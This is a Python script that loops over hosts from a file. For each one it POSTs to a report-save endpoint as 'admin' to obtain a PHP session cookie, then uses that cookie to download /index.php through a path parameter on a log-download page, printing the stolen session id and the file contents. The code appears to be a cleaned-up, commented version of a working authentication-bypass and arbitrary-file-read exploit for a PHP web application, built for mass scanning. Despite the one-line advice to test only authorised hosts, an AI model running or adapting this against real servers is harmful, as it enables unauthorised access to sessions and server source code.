import time
from urllib.parse import urlsplit

import requests
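def get_hosts_from_file(file_path):
    """Read the target list from *file_path*, one host per line.

    Args:
        file_path: Path to a text file with one host (``host`` or
            ``host:port``) per line.

    Returns:
        A list of stripped, non-empty host strings in file order. Blank
        lines are skipped: the original returned ``''`` for them, which the
        caller turned into a malformed ``http:///...`` URL.

    Raises:
        OSError: if the file cannot be opened or read.
    """
    with open(file_path, 'r', encoding='utf-8') as file:
        stripped = (line.strip() for line in file)
        return [host for host in stripped if host]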
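def _extract_phpsessid(set_cookie):
    """Return the ``'PHPSESSID=<value>'`` pair from a raw Set-Cookie header.

    Args:
        set_cookie: The Set-Cookie header value as a single string.

    Returns:
        The substring starting at ``PHPSESSID=`` up to (not including) the
        next ``;``, or ``None`` when no such cookie is present.
    """
    start = set_cookie.find('PHPSESSID=')
    if start == -1:
        return None
    end = set_cookie.find(';', start)
    # str.find returns -1 when the cookie is the last item and has no
    # trailing ';'. The original sliced to -1 in that case and silently
    # dropped the final character of the session id.
    if end == -1:
        end = len(set_cookie)
    return set_cookie[start:end]


def send_post_request(url, data, headers, timeout=10):
    """POST *data* to *url* and return the PHPSESSID cookie the server set.

    Args:
        url: Target URL.
        data: Form fields, sent form-encoded by ``requests``.
        headers: Request headers, passed through unchanged.
        timeout: Seconds to wait for connect/read. The original sent no
            timeout, so its ``requests.Timeout`` handler could never fire
            and a single hung host stalled the whole run.

    Returns:
        ``'PHPSESSID=<value>'`` (prefix included, ready to be used verbatim
        as a ``Cookie`` header value) when the response carries that cookie,
        otherwise ``None``. Request failures are printed and also yield
        ``None``.
    """
    try:
        response = requests.post(url, data=data, headers=headers, timeout=timeout)
    except requests.ConnectionError as e:
        print(f"Connection error occurred: {e}")
        return None
    except requests.Timeout as e:
        print(f"Timeout error occurred: {e}")
        return None
    except requests.RequestException as e:
        print(f"An error occurred: {e}")
        return None

    set_cookie = response.headers.get('Set-Cookie')
    if set_cookie is None:
        print("Set-Cookie header not found in the response")
        return None

    phpsessid = _extract_phpsessid(set_cookie)
    if phpsessid is None:
        print("PHPSESSID not found in Set-Cookie")
        return None

    # NOTE(review): this writes a live session token to stdout; keep the
    # script's output out of shared logs.
    print(phpsessid)
    return phpsessid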
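def send_get_request_with_cookie(url, headers, cookie_value, timeout=10):
    """GET *url* with *cookie_value* as the ``Cookie`` header and print the body.

    Args:
        url: Target URL.
        headers: Base request headers. A copy is used, so the caller's dict
            is no longer mutated (the original wrote ``Cookie`` into it).
        cookie_value: Full cookie string, e.g. ``'PHPSESSID=abc'``.
        timeout: Seconds to wait for connect/read; the original sent none,
            so its ``requests.Timeout`` handler was unreachable.

    Returns:
        The ``requests.Response`` on success, ``None`` if the request raised
        (the error is printed).
    """
    request_headers = dict(headers)
    request_headers['Cookie'] = cookie_value
    try:
        response = requests.get(url, headers=request_headers, timeout=timeout)
    except requests.ConnectionError as e:
        print(f"Connection error occurred: {e}")
        return None
    except requests.Timeout as e:
        print(f"Timeout error occurred: {e}")
        return None
    except requests.RequestException as e:
        print(f"An error occurred: {e}")
        return None

    # The original printed the module-level loop variable ``host`` here,
    # which is a NameError whenever this function is called from anywhere
    # but the script body. Derive the host from the URL instead.
    print("当前HOST=================================" + urlsplit(url).netloc)
    print(response.text)  # Print the response text to see the result
    return response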
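if __name__ == "__main__":
    # Script body. For every host in url.txt: POST the form below to
    # DesignReportSave.html over plain HTTP; if the reply sets a PHPSESSID
    # cookie, reuse it to GET downLoad.html?path=/index.php and print the
    # body. Run this only against hosts you are authorised to test -- it
    # sends traffic to every entry in the file and echoes session ids.
    hosts = get_hosts_from_file('url.txt')

    # Form fields for the POST. The response is only inspected for a
    # Set-Cookie: PHPSESSID header; the body is not used.
    data = {
        'aa': 'xx',
        'userID': 'admin',
        'fondsid': '1',
        'comid': '1'
    }

    # Deliberately a top-level loop rather than a main(): `host` must stay a
    # module-level name because the helper's progress print relied on it.
    for host in hosts:
        post_url = f"http://{host}/Setting/Report/DesignReportSave.html?report=&token=java"
        # Headers copied from a browser capture. `Origin` still points at
        # the capturing host; presumably not checked by the target -- TODO
        # confirm. The hard-coded `Content-Length: 66` has been dropped: the
        # encoded body is 36 bytes, and requests computes the length from
        # the body it actually sends.
        post_headers = {
            'Host': host,
            'Accept-Encoding': 'gzip, deflate',
            'Origin': 'http://49.4.48.132',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
            'Cookie': 'winWidth=1920; winHeight=455',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
        }
        phpsessid = send_post_request(post_url, data, post_headers)

        # Only hosts that handed out a session are queried a second time.
        if phpsessid:
            get_url = f"http://{host}/Logs/Annals/downLoad.html?path=/index.php"
            get_headers = {
                'Host': host,
                'Pragma': 'no-cache',
                'Cache-Control': 'no-cache',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
                'Accept-Encoding': 'gzip, deflate, br',
                'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
                'Connection': 'close'
            }
            send_get_request_with_cookie(get_url, get_headers, phpsessid)

        time.sleep(1)  # Pause between hosts to avoid overwhelming the server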